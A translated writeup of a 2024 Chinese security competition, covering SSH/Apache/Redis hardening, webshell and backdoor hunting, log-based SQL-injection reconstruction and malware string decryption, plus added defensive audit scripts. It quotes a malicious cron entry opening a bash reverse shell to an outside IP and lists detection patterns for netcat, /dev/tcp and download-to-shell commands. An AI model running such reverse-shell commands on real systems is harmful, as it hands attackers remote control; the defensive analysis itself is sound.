Reply with "2024数信杯西区附件" (2024 Shuxin Cup West Region attachments) to get the file download link. Most of the challenges in this competition ran on servers, so only the files for the log analysis, malware analysis and traffic analysis challenges are available.
Portal website
1. SSH configuration (check)
Edit the /etc/ssh/sshd_config file:
```
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
```
Delete the .ssh/authorized_keys2 file.
When done, restart the ssh service:
```
service ssh restart
```
2. Apache security policy configuration (check)
Edit the /etc/apache2/apache2.conf file:
```
ServerTokens Prod
ServerSignature Off
```
In the same file, fix the unsafe item in the <Directory /> block:
```
<Directory />
Options Indexes FollowSymLinks
AllowOverride None
Require all denied
</Directory>
```
`Options Indexes FollowSymLinks` enables directory listing; change it to
`Options FollowSymLinks`
Restart Apache after the change.
3. MySQL database incremental recovery (check)
OA system
1. Redis hardening (check)
In the config file, find the line `# requirepass foobared`, remove the leading `#` and set it to `requirepass 6b95fa87`.
Change `bind 0.0.0.0` to `bind 127.0.0.1` so that only local connections are accepted.
```
redis-server /etc/redis/redis.
```
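The SSH and Redis fixes above both come down to a handful of `directive value` lines that must be present, uncommented and set to the hardened value. The following added script (not part of the original writeup) audits an sshd_config and a redis.conf text against those expected values and reports every deviation, so a defender can verify the fix from the "portal website" and "OA system" sections in one pass. The expected-value tables and the before/after samples are assumptions constructed from the settings listed above; note that sshd honours the first occurrence of a directive and Redis the last, and that directives inside an sshd `Match` block are conditional and are deliberately not read as global.

```python
import re
from typing import Dict, List, Optional, Tuple

# Expected hardened values, keyed by lower-cased directive name (assumed baseline
# mirroring the sshd_config and redis.conf changes made in this writeup).
# None means "must be present and uncommented, with any value".
SSHD_EXPECTED: Dict[str, Optional[str]] = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
}
REDIS_EXPECTED: Dict[str, Optional[str]] = {
    "bind": "127.0.0.1",
    "requirepass": None,
}


def parse_directives(text: str) -> List[Tuple[str, str]]:
    """Parse the 'directive value' line format shared by sshd_config and redis.conf.
    Comment lines are skipped, so '# requirepass foobared' does NOT count as
    setting requirepass. Order is preserved for first-wins / last-wins handling."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd_config also accepts 'Key=Value'; normalise both spellings
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        pairs.append((key, value))
    return pairs


def effective_values(pairs: List[Tuple[str, str]], first_wins: bool) -> Dict[str, str]:
    """sshd uses the FIRST occurrence of a directive, Redis the LAST.
    Caveat: directives after an sshd 'Match' line are conditional, so parsing
    stops there instead of treating them as global settings."""
    eff: Dict[str, str] = {}
    for key, value in pairs:
        if first_wins and key == "match":
            break
        if first_wins and key in eff:
            continue
        eff[key] = value
    return eff


def audit(text: str, expected: Dict[str, Optional[str]], first_wins: bool = True) -> List[str]:
    """Return one human-readable finding per directive that deviates from `expected`."""
    eff = effective_values(parse_directives(text), first_wins)
    findings = []
    for key, want in expected.items():
        got = eff.get(key)
        if got is None:
            findings.append(f"{key}: not set (missing or still commented out)")
        elif want is not None and got.lower() != want.lower():
            findings.append(f"{key}: is '{got}', expected '{want}'")
    return findings


def audit_sshd(text: str) -> List[str]:
    return audit(text, SSHD_EXPECTED, first_wins=True)


def audit_redis(text: str) -> List[str]:
    return audit(text, REDIS_EXPECTED, first_wins=False)


# Constructed samples: the weak state found on the box and the state after the fix.
SSHD_BEFORE = """\
Port 22
PubkeyAuthentication yes
PasswordAuthentication yes
#ChallengeResponseAuthentication no
"""
SSHD_AFTER = """\
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
"""
REDIS_BEFORE = """\
bind 0.0.0.0
# requirepass foobared
"""
REDIS_AFTER = """\
bind 127.0.0.1
requirepass REPLACE_WITH_A_STRONG_PASSWORD
"""

if __name__ == "__main__":
    for name, fn, before, after in (("sshd_config", audit_sshd, SSHD_BEFORE, SSHD_AFTER),
                                    ("redis.conf", audit_redis, REDIS_BEFORE, REDIS_AFTER)):
        print(f"{name} before fix:", fn(before) or "OK")
        print(f"{name} after fix: ", fn(after) or "OK")
```

To audit a live host, pass the file contents to `audit_sshd` / `audit_redis` (for example `audit_sshd(open('/etc/ssh/sshd_config').read())`); a `bind` line listing several addresses, such as `bind 127.0.0.1 ::1`, is reported as a deviation and should be reviewed by hand.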
2. Webshell analysis (check)
Scanned for webshells with Hema (河马).
3. AntSword traffic analysis (flag)
Analyse the AntSword (蚁剑) traffic and decode the base64.
flag{FC0F33EF-4599-D30E-F6DF-EE9660A9DAD1}
4. Backdoor discovery (flag)
netstat -ano showed an outbound connection.
flag{121.13.2.33:5432}
5. Backdoor removal (check)
ps -aux showed a suspicious psql process; tracing it:
```
cd /proc/PID
ll exe
```
The executable turned out to be /usr/bin/python3.6.
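The `psql` that was really `/usr/bin/python3.6` is found by comparing what a process shows in `ps` (its argv[0]) with the binary `/proc/PID/exe` actually points at. The following added script (not from the original writeup) automates that comparison: `is_masquerading` flags a process whose presented name and real executable do not match, tolerating login-shell dashes (`-bash`), version suffixes (`python3` vs `python3.6`) and daemons that rewrite their title (`sshd: user@pts/0`), and also flags binaries deleted from disk after launch. `scan_live_proc` reads `/proc` on a real host (root is needed to read other users' `exe` links); the `SAMPLE` list is constructed and modelled on the listing above.

```python
import os
from typing import List, Tuple

DELETED_SUFFIX = " (deleted)"


def presented_name(argv0: str) -> str:
    """Name a process presents in ps output: basename of the first token of argv[0],
    minus the leading '-' that login shells use (e.g. '-bash')."""
    name = os.path.basename(argv0.split()[0]) if argv0.strip() else ""
    return name[1:] if name.startswith("-") and len(name) > 1 else name


def is_masquerading(argv0: str, exe: str) -> bool:
    """True when the argv[0] a process shows (what `ps` prints) does not match the
    binary /proc/PID/exe really points at, as with 'psql' running /usr/bin/python3.6.
    Prefix matching tolerates version suffixes (python3 vs python3.6) and daemons
    that append status text to their name (e.g. 'nginx: worker process')."""
    if not argv0 or not exe:
        return False  # kernel threads have no cmdline; nothing to compare
    shown = presented_name(argv0)
    real = os.path.basename(exe)
    if real.endswith(DELETED_SUFFIX):
        real = real[: -len(DELETED_SUFFIX)]  # binary removed after start: still compare the name
    if not shown:
        return False
    return not (shown.startswith(real) or real.startswith(shown))


def scan_entries(entries: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """entries: (pid, argv0, exe). Returns the subset that looks like masquerading."""
    return [e for e in entries if is_masquerading(e[1], e[2])]


def scan_live_proc() -> List[Tuple[str, str, str]]:
    """Collect (pid, argv0, exe) for every process in /proc. Needs root to read other
    users' exe links; a binary deleted from disk keeps the ' (deleted)' suffix."""
    entries = []
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # process exited, or not permitted
        entries.append((pid, argv0, exe))
    return entries


# Constructed sample modelled on the listing above: a 'psql' that is really python3.6,
# alongside benign entries that must not be reported.
SAMPLE = [
    ("1234", "psql", "/usr/bin/python3.6"),
    ("42", "-bash", "/usr/bin/bash"),
    ("77", "/usr/bin/python3", "/usr/bin/python3.6"),
    ("99", "nginx: worker process", "/usr/sbin/nginx"),
    ("500", "sshd: user@pts/0", "/usr/sbin/sshd"),
]

if __name__ == "__main__":
    for pid, argv0, exe in scan_entries(SAMPLE):
        print(f"pid {pid}: shows as {argv0!r} but runs {exe}")
    for pid, argv0, exe in scan_entries(scan_live_proc()):
        print(f"live pid {pid}: shows as {argv0!r} but runs {exe}")
```

A hit is a lead, not a verdict: confirm it with `ls -l /proc/PID/exe`, `/proc/PID/cwd` and the process's open sockets before removing anything, as the writeup does with `cd /proc/PID` and `ll exe`.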
6. File decryption (flag)
7. Database recovery (check)
Instant collaboration server
1. Weak password change (check)
Changed it directly in the admin backend.
2. hsqldb data migration to MySQL (check)
3. Authentication bypass vulnerability fix (check)
Edit openfire's openfire.xml directly:
```
root@16bb35eba610:/home/user/openfire/conf# sed -i 's/<port>9090<\/port>/<port>12335<\/port>/g' openfire.xml
root@16bb35eba610:/home/user/openfire/conf# cat conf/openfire.xml | grep port
cat: conf/openfire.xml: No such file or directory
root@16bb35eba610:/home/user/openfire/conf# cat openfire.xml | grep port
<!-- Disable either port by setting the value to -1 -->
<port>12335</port>
```
Attacker machine
1. ThinkPHP RCE (flag)
disable_functions is set, so readfile was used to read the file directly.
Personal file system
1. nginx log analysis
Read /var/log/nginx/access.log; the log shows a boolean-based blind SQL injection, so write a script to extract the injected data:
```python
import re

# Path of the log being analysed (the file named above)
log_file_path = '/var/log/nginx/access.log'

def extract_data_from_logs(file_path):
    data = {}
    # Match the injected condition ascii(substr((select(group_concat(flag))from(flag)),POS,1))>VALUE
    ascii_pattern = re.compile(r'ascii\(substr\(\(select\(group_concat\(flag\)\)from\(flag\)\),(\d+),1\)\)>(\d+)')
    # Match the status code and response size; a 940-byte response marks a "true" condition
    response_pattern = re.compile(r'HTTP/1\.1" 200 (\d+)')
    # Read the entire log file
    with open(file_path, 'r') as file:
        logs = file.readlines()
    for line in logs:
        ascii_match = ascii_pattern.search(line)
        response_match = response_pattern.search(line)
        if ascii_match and response_match:
            # Extract character position, ASCII comparison value, and response size
            position = int(ascii_match.group(1))
            ascii_value = int(ascii_match.group(2))
            response_size = int(response_match.group(1))
            # Initialize the list for this position if it does not exist yet
            if position not in data:
                data[position] = []
            # Append tuple of (ascii_value, whether the condition was true)
            data[position].append((ascii_value, response_size == 940))
    # Reconstruct the data by determining the ASCII value for each position
    reconstructed_data = {}
    for pos, values in data.items():
        # Replay the attacker's binary search: each ">value" comparison narrows the range
        values.sort()
        low, high = 0, 127  # ASCII range
        for ascii_value, is_true in values:
            if is_true:
                low = max(low, ascii_value + 1)
            else:
                high = min(high, ascii_value)
        # The lowest value consistent with every comparison is the character
        reconstructed_data[pos] = chr(low)
    # Convert the dictionary to a string sorted by position
    result = ''.join(reconstructed_data[pos] for pos in sorted(reconstructed_data))
    return result

# Call the function and print the extracted data
extracted_data = extract_data_from_logs(log_file_path)
print(extracted_data)
```
This gives flag{W0w_y0u_f1nd_a7tack_1n_acc3ss_log_BFSFDC#@DS}
2. Scheduled task log analysis
```
root@245e7643a7df:/# cat /etc/cron.d/*
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
* * * * * root bash -i >& /dev/tcp/8.8.36.233/9001 0>&1
```
flag{8.8.36.233:9001}
3. Scheduled task removal (check)
```
root@245e7643a7df:/# rm /etc/cron.d/safeline
```
Then killed the cron process.
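Reading `/etc/cron.d/*` by eye works on one box; across a fleet the same check should be a script. The following added example (not from the original writeup) parses system-crontab lines (schedule, user, command, plus `@reboot`-style entries and `VAR=value` lines), matches each command against a short indicator list (a `/dev/tcp` redirection, an interactive shell, `nc -e`, a download piped into a shell, a base64-decoded payload), and extracts the remote host:port when a `/dev/tcp/HOST/PORT` redirection is present, which is exactly the value the writeup reports. The indicator list is an assumption and will not catch everything; the sample input is the listing above with a constructed comment and `SHELL=` header added. Per-user crontabs under `/var/spool/cron` have no user field and would need a six-field variant of `split_cron_line`.

```python
import re
from typing import Dict, List, Optional, Tuple

# Indicators a defender would not expect in a legitimate cron job (assumed list).
SUSPICIOUS = [
    (re.compile(r"/dev/(?:tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})"), "bash network redirection"),
    (re.compile(r"\b(?:bash|sh|zsh)\s+-i\b"), "interactive shell launched from cron"),
    (re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\b"), "netcat with -e"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"\bbase64\s+(?:-d|--decode)\b"), "base64-decoded payload"),
]


def split_cron_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Split a system crontab line (/etc/cron.d, /etc/crontab) into
    (schedule, user, command). Returns None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
        return None  # environment assignment such as SHELL=/bin/sh
    if line.startswith("@"):  # @reboot, @daily, ...
        parts = line.split(None, 2)
        return (parts[0], parts[1], parts[2]) if len(parts) == 3 else None
    parts = line.split(None, 6)  # five schedule fields, user, command
    if len(parts) < 7:
        return None
    return " ".join(parts[:5]), parts[5], parts[6]


def scan_cron_text(text: str) -> List[Dict[str, str]]:
    """Return one finding per cron entry whose command matches an indicator."""
    findings = []
    for raw in text.splitlines():
        parsed = split_cron_line(raw)
        if parsed is None:
            continue
        schedule, user, command = parsed
        reasons, endpoint = [], ""
        for pattern, label in SUSPICIOUS:
            m = pattern.search(command)
            if m:
                reasons.append(label)
                if pattern.groups == 2:  # only the /dev/tcp pattern captures host and port
                    endpoint = f"{m.group(1)}:{m.group(2)}"
        if reasons:
            findings.append({"schedule": schedule, "user": user, "command": command,
                             "reasons": "; ".join(reasons), "endpoint": endpoint})
    return findings


def scan_cron_files(paths: List[str]) -> List[Dict[str, str]]:
    """Scan each readable file (e.g. glob('/etc/cron.d/*') + ['/etc/crontab'])."""
    out = []
    for path in paths:
        try:
            with open(path) as f:
                for finding in scan_cron_text(f.read()):
                    finding["file"] = path
                    out.append(finding)
        except OSError:
            continue
    return out


# The /etc/cron.d listing above, with a constructed comment and SHELL line prepended.
SAMPLE_CRON = """\
# constructed header line
SHELL=/bin/sh
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
* * * * * root bash -i >& /dev/tcp/8.8.36.233/9001 0>&1
"""

if __name__ == "__main__":
    for f in scan_cron_text(SAMPLE_CRON):
        print(f"[{f['schedule']}] user={f['user']} endpoint={f['endpoint'] or '-'}: {f['reasons']}")
        print("   ", f["command"])
```

The two benign `e2scrub` entries produce no finding; the minute-by-minute reverse shell is reported with both the redirection and the interactive-shell reason and the endpoint `8.8.36.233:9001`.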
4. sudo group backdoor (check)
```
root@245e7643a7df:/# getent group sudo
sudo:x:27:
root@245e7643a7df:/# getent group
h4ck:x:1000:
root@245e7643a7df:/# getent group root
root:x:0:
root@245e7643a7df:/# getent group h4ck
h4ck:x:1000:
root@245e7643a7df:/# deluser h4ck
Removing user `h4ck' ...
Warning: group `h4ck' has no more members.
Done.
root@245e7643a7df:/#
```
5. SUID removal (check)
```
root@245e7643a7df:/# find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/zsh
/usr/bin/sudo
chmod u-s zsh
```
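Both the sudo-group check and the SUID check above are "compare what is on the box against what should be there". The following added script (not from the original writeup) does that for both: it diffs the `find / -perm -4000` output against a baseline set of SUID-root binaries and reports extras such as `/usr/bin/zsh`, and it parses `getent group` / `/etc/group` lines and reports any member of a privileged group that is not on an allow list. The baseline and the privileged-group list are assumptions; in practice the baseline should be generated from a pristine image of the same distribution and should include file hashes, since a baseline path can be replaced by a trojaned binary of the same name. The `find` sample is the listing above; the group sample is constructed with `h4ck` placed in `sudo` so that the check fires (the listing above showed `sudo` empty).

```python
from typing import Dict, List, Set, Tuple

# Minimal assumed baseline of SUID-root binaries on a Debian/Ubuntu host.
# Generate the real one from a clean install and record hashes alongside paths.
SUID_BASELINE: Set[str] = {
    "/usr/bin/newgrp", "/usr/bin/umount", "/usr/bin/chfn", "/usr/bin/passwd",
    "/usr/bin/mount", "/usr/bin/gpasswd", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/sudo",
}

# Groups whose membership grants elevated privilege (assumed list); every member
# must be explicitly allowed.
PRIVILEGED_GROUPS = ("root", "sudo", "wheel", "adm")


def parse_find_output(text: str) -> List[str]:
    """One path per non-empty line, as printed by find -print."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(found: List[str], baseline: Set[str] = SUID_BASELINE) -> List[str]:
    """SUID-root binaries present on the host but absent from the baseline."""
    return sorted(p for p in found if p not in baseline)


def parse_group_db(text: str) -> Dict[str, Tuple[int, List[str]]]:
    """Parse `getent group` / /etc/group lines: name:x:gid:member1,member2"""
    groups: Dict[str, Tuple[int, List[str]]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.count(":") < 3:
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def unexpected_group_members(text: str, allowed: Set[str] = frozenset()) -> List[Tuple[str, str]]:
    """(group, user) pairs for privileged groups whose member is not on the allow list."""
    groups = parse_group_db(text)
    out = []
    for g in PRIVILEGED_GROUPS:
        _gid, members = groups.get(g, (None, []))
        for m in members:
            if m not in allowed:
                out.append((g, m))
    return out


# The find output from the listing above.
FIND_OUTPUT = """\
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/zsh
/usr/bin/sudo
"""

# Constructed group database: h4ck added to sudo so the check has something to report.
GROUP_DB = """\
root:x:0:
sudo:x:27:h4ck
h4ck:x:1000:
"""

if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(FIND_OUTPUT)):
        print(f"unexpected SUID binary: {path}  (clear with: chmod u-s {path})")
    for group, user in unexpected_group_members(GROUP_DB, allowed={"ops"}):
        print(f"unexpected member of privileged group {group}: {user}")
```

On a live host feed it the real data, e.g. `unexpected_suid(parse_find_output(subprocess.check_output(['find', '/', '-user', 'root', '-perm', '-4000', '-print'], stderr=subprocess.DEVNULL, text=True)))` and `unexpected_group_members(open('/etc/group').read(), allowed=YOUR_ADMINS)`.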
Mail server
1. Redundant mailbox discovery (flag)
Query MySQL (the MySQL password in the config file is mysql), export the addresses and write a script to compare them against the staff list:
```python
import pandas as pd

def read_emails_from_excel(file_path):
    df = pd.read_excel(file_path, engine='openpyxl')
    # Assume the mailbox column is named "邮箱"; normalise to lower case
    return [email.lower() for email in df['邮箱'].dropna()]

email_list = read_emails_from_excel('员工.xlsx')
# print(email_list)
print(len(email_list))

def read_emails_from_txt(file_path):
    with open(file_path, 'r') as file:
        # Read each line, strip surrounding whitespace, normalise to lower case
        emails = [line.strip().lower() for line in file.readlines()]
    return emails

db_emails = read_emails_from_txt('mysql_data.txt')
print(len(db_emails))

# Any address in the database that is not in the staff list is a redundant mailbox
for i in db_emails:
    if i not in email_list:
        print(i)
        print(db_emails.index(i))
```
```
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{[email protected]}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%
```
2. Phishing email discovery (flag)
Downloaded all the files; searching for "gophish" and "fish" turned up this file:
3. Phishing email analysis and tracing (flag)
Submit the email address at the beginning of the file above:
```
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{[email protected]}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%
```
4. Malware analysis 1 (flag)
The strings were encrypted with XOR, base64 and a Caesar cipher; decryption script:
```python
import base64

def decrypt_caesar_cipher(text, shift):
    """
    Decrypt a Caesar cipher
    :param text: encrypted text (string)
    :param shift: shift amount (integer)
    :return: decrypted text (string)
    """
    decrypted_text = ""
    for char in text:
        if char.isalpha():  # only letters are shifted
            # Base ASCII code of the alphabet: 65 for upper case, 97 for lower case
            start = 65 if char.isupper() else 97
            # Subtract the base, shift left by `shift`, and wrap around with mod 26
            shifted = (ord(char) - start - shift) % 26
            # Convert back to a character and append it to the result
            decrypted_text += chr(start + shifted)
        else:
            # Non-letter characters are left unchanged
            decrypted_text += char
    return decrypted_text

def decrypt(inputstr):
    result = ''
    # Layer 1: XOR every character with 0x18
    for i in inputstr:
        result += chr(ord(i) ^ 0x18)
    # Layer 2: restore the stripped base64 padding to a multiple of 4, then decode
    result += '=' * (-len(result) % 4)
    result = base64.b64decode(result).decode()
    # Layer 3: Caesar cipher with a shift of 17
    result = decrypt_caesar_cipher(result, 17)
    return result

strlist = [
    'B*t.z@hr|vp*Wrh)|vVk}Y',
    'A*ha|O`sBbw.A*haQ[!v{ul(}IZ',
    'yvJ-y+RiAuw',
    'T+Jh|vRj|qYny*M',
    'QsJ.|_tuyuB+y)B)}PBUB+Nay+BT{uhqJPR(}@ht|tR,|uNjQqYny*s',
    'Q[!i|[Z){vhr{[Ynyuk',
    'ULM.ULI.UY',
    'T*trQPt.}Pt*yuk',
    'T+{Y',
]
for i in strlist:
    print(decrypt(i))
```
After decryption the scheduled task command is visible:
5. Malware analysis 2 (flag)
```
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:\windows\system32\zvzvxngm.exe}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:\windows\system32\zvzvxngm}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{C:\Windows\System32\zvzvxngm.exe}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"invalid_flag","msg":"invalid flag, hack harder"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:\windows\system32}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"flag_capture_exception","msg":"failed to handle flag capture, please contact system admin"}%
➜ 24sxb curl -F "token=5YhXssbz3nfk" -F "flag=flag{c:\windows\system32}" http://shuxinbei2.chaitin.cn/api/flag/submit
{"err":"already_solved","msg":"flag accpeted! But you have already solved this problem before"}%
➜ 24sxb
```
6. Malicious traffic analysis (flag)
Algorithm challenge
```python
import cv2
import numpy as np

# Read the original image
image = cv2.imread('embedded.png')
if image is None:
    raise SystemExit('embedded.png could not be read')
# Generate Gaussian noise
mean = 0
sigma = 3  # standard deviation, adjustable
gaussian = np.random.normal(mean, sigma, image.shape)
# Add the noise to the image (uint8 + float64 promotes to float64)
noisy_image = image + gaussian
# Clamp pixel values to the 0-255 range and convert back to 8-bit
noisy_image = np.clip(noisy_image, 0, 255).astype(np.uint8)
# Save the processed image
cv2.imwrite('processed_image.png', noisy_image)
```
Originally published on the WeChat public account BeFun安全实验室 (BeFun Security Lab): 2024数信杯西区题解 (2024 Shuxin Cup West Region writeup)